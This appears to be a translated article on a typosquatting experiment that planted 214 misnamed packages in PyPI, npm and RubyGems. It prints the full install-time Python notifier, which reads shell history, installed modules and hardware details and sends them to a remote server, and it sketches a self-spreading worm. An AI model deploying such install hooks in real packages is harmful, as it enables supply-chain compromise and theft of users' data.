Typosquatting in Python, Node.JS, and Ruby repositories

    The effectiveness of the attack has been proven in the distribution of malicious code through the repositories PyPi (Python), Npmjs.com (Node.js) and rubygems.org (Ruby)


    It turns out that typosquatting is not only suitable for registering domain names. German security specialist Nikolai Tschacher has demonstrated how easy it is to distribute malicious code through PyPi , a directory of software written in the Python programming language, as well as through the NodeJS repositories (Npmsjs.com) and Ruby (rubygems.org).

    So, we publish the package with a typo in the title - and wait for someone to make a typo in their console ...

    > sudo pip install reqeusts


    During a small experiment, Nikolai infected 17,000 computers for research purposes, and 43.6% of the installations were performed with administrator rights, including on servers in the government domains .gov and .mil .

    Typosquatting and Beatsquatting
    Hackers have long been using typosquatting to drive random traffic to meaningless sites like microsodft.com. This attack is effective due to the laws of large numbers. If a billion people type the site URL in the address bar, then a million of them will make some kind of mistake. About a thousand will go to the prepared site, where they are waiting for an exploit pack using fresh 0day. Or, for example, you can just twist ads on such sites, receiving money from the air.

    Traditional typosquatters register thousands of addresses; in advanced companies, along with the main domain, they always register possible typosquatting options by setting up a redirect. Some even use typosquatting to pick up someone else’s traffic. For example, Google redirects traffic to itself from the domain duck.com .

    By the way, there’s also bittsquatting - an exotic kind of typosquatting. Here the calculation does not go to the human, but to a hardware error. Bitsquatting relies on the fact that any of the devices connected to the Internet accidentally makes a mistake and changes one necessary bit in the DNS query, so that the traffic goes instead of the original site to the attacker's site. For such attacks, the domains of CDN and ad networks are selected, the content of which is uploaded to thousands of popular sites. These are domains like fbcdn.net, 2mdn.net and akamai.com.

    Nikolay Chaher got acquainted with the methods of standard typosquatting and asked the question: how many people will make a mistake in the name of the package if they manually install pockets through the package manager. For example, the pip package manager downloads packages from the PyPi repository. If we create an arbitrary package called reqeusts (anyone can upload it to the repository) instead of the standard requests module , then our package will be downloaded and installed by all users who make a typo when typing a command.

    To test the effectiveness of the attack, Nikolai created 214 packageswith various types of typos in the name, including unregistered variants of names from the standard library (for example, urllib2), and uploaded them to the repository for several months in the second half of 2015 and early 2016.

    In Python packages, malicious code was hidden in the setup.py file , which runs as administrator. A pre-installation script was written for NPM modules , but I had to tinker with Ruby packages .

    When installing each fictitious Typosquatter package, a notification was sent to the server indicating the IP address, operating system, user rights and timestamp.

    Notifier Code
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    """
    Notification program used in the typo squatting
    bachelor thesis for the python package index.
    Created in autumn 2015.
    Copyright by Nikolai Tschacher
    """
    import os
    import ctypes
    import sys
    import platform
    import subprocess
    debug = False
    # we are using Python3
    if sys.version_info[0] == 3:
      import urllib.request
      from urllib.parse import urlencode
      GET = urllib.request.urlopen
      def python3POST(url, data={}, headers=None):
        """
        Returns the response of the POST request as string or
        False if the resource could not be accessed.
        """
        data = urllib.parse.urlencode(data).encode()
        request = urllib.request.Request(url, data)
        try:
          reponse = urllib.request.urlopen(request, timeout=15)
          cs = reponse.headers.get_content_charset()
          if cs:
            return reponse.read().decode(cs)
          else:
            return reponse.read().decode('utf-8')
        except urllib.error.HTTPError as he:
          # try again if some 400 or 500 error was received
          return ''
        except Exception as e:
          # everything else fails
          return False
      POST = python3POST
    # we are using Python2
    else:
      import urllib2
      from urllib import urlencode
      GET = urllib2.urlopen
      def python2POST(url, data={}, headers=None):
        """
        See python3POST
        """
        req = urllib2.Request(url, urlencode(data))
        try:
          response = urllib2.urlopen(req, timeout=15)
          return response.read()
        except urllib2.HTTPError as he:
          return ''
        except Exception as e:
          return False
      POST = python2POST
    try:
      from subprocess import DEVNULL # py3k
    except ImportError:
      DEVNULL = open(os.devnull, 'wb')
    def get_command_history():
      if os.name == 'nt':
        # handle windows
        # http://serverfault.com/questions/95404/
        #is-there-a-global-persistent-cmd-history
        # apparently, there is no history in windows :(
        return ''
      elif os.name == 'posix':
        # handle linux and mac
        cmd = 'cat {}/.bash_history | grep -E "pip[23]? install"'
        return os.popen(cmd.format(os.path.expanduser('~'))).read()
    def get_hardware_info():
      if os.name == 'nt':
        # handle windows
        return platform.processor()
      elif os.name == 'posix':
        # handle linux and mac
        if sys.platform.startswith('linux'):
          try:
            hw_info = subprocess.check_output('lshw -short',
                       stderr=DEVNULL, shell=True)
          except:
            hw_info = ''
          if not hw_info:
            try:
              hw_info = subprocess.check_output('lspci',
                       stderr=DEVNULL, shell=True)
            except:
              hw_info = ''
            hw_info += '\n' +\
              os.popen('free -m').read().strip()
          return hw_info
        elif sys.platform == 'darwin':
          # According to https://developer.apple.com/library/
          # mac/documentation/Darwin/Reference/ManPages/
          # man8/system_profiler.8.html
          # no personal information is provided by detailLevel: mini
          return os.popen('system_profiler -detailLevel mini').read()
    def get_all_installed_modules():
      # first try the default path
      pip_list = os.popen('pip list').read().strip()
      if pip_list:
        return pip_list
      else:
        if os.name == 'nt':
          paths = ('C:/Python27',
               'C:/Python34',
               'C:/Python26',
               'C:/Python33',
               'C:/Python35',
               'C:/Python',
               'C:/Python2',
               'C:/Python3')
          # try some paths that make sense to me
          for loc in paths:
            pip_location = os.path.join(loc, 'Scripts/pip.exe')
            if os.path.exists(pip_location):
              cmd = '{} list'.format(pip_location)
              try:
                pip_list = subprocess.check_output(cmd,
                       stderr=DEVNULL, shell=True)
              except:
                pip_list = ''
              if pip_list:
                return pip_list
      return ''
    def notify_home(url, package_name, intended_package_name):
      host_os = platform.platform()
      try:
        admin_rights = bool(os.getuid() == 0)
      except AttributeError:
        try:
          ret = ctypes.windll.shell32.IsUserAnAdmin()
          admin_rights = bool(ret != 0)
        except:
          admin_rights = False
      if os.name != 'nt':
        try:
          pip_version = os.popen('pip --version').read()
        except:
          pip_version = ''
      else:
        pip_version = platform.python_version()
      url_data = {
        'p1': package_name,
        'p2': intended_package_name,
        'p3': 'pip',
        'p4': host_os,
        'p5': admin_rights,
        'p6': pip_version,
      }
      post_data = {
        'p7': get_command_history(),
        'p8': get_all_installed_modules(),
        'p9': get_hardware_info(),
      }
      url_data = urlencode(url_data)
      response = POST(url + url_data, post_data)
      if debug:
        print(response)
      print('')
      print("Warning!!! Maybe you made a typo in your installation\
       command or the module does only exist in the python stdlib?!")
      print("Did you want to install '{}'\
       instead of '{}'??!".format(intended_package_name, package_name))
      print('For more information, please\
       visit http://svs-repo.informatik.uni-hamburg.de/')
    def main():
      if debug:
        notify_home('http://localhost:8000/app/?',
                 'pmba_basic', 'pmba_basic')
      else:
        notify_home('http://svs-repo.informatik.uni-hamburg.de/app/?',
                         'pmba_basic', 'pmba_basic')
    if __name__ == '__main__':
      main()

    The results were stunning. The server notifier received 45,334 installation notifications from 17,289 unique IP addresses .

    Most installations generated dummy packages for PyPi: 15,221 unique IP addresses. Rubygems.org had 1631 installations, NPM - 525. On average, each package was installed 92 times, but urllib2 with 3929 unique installations was the most popular.



    The victims of the attack were distributed between different operating systems: Linux (8614), Windows (6174), OS X (4758) and other OS (57).

    The mapping of IP addresses to hosts gave the following picture.



    Hosts nationality, by country


    Full research results published in thesisNikolai Chaher.

    By the way, the author offers the idea that this type of attack can be used to spread a worm that will mine the history of the entered commands in the console under Linux and OS X in order to find new typos that are not in the database.

    Theoretically, the worm itself can search for new attack vectors (new typos), generate new packets, upload them to the repository along with its code, and thus spread further.

    Also popular now: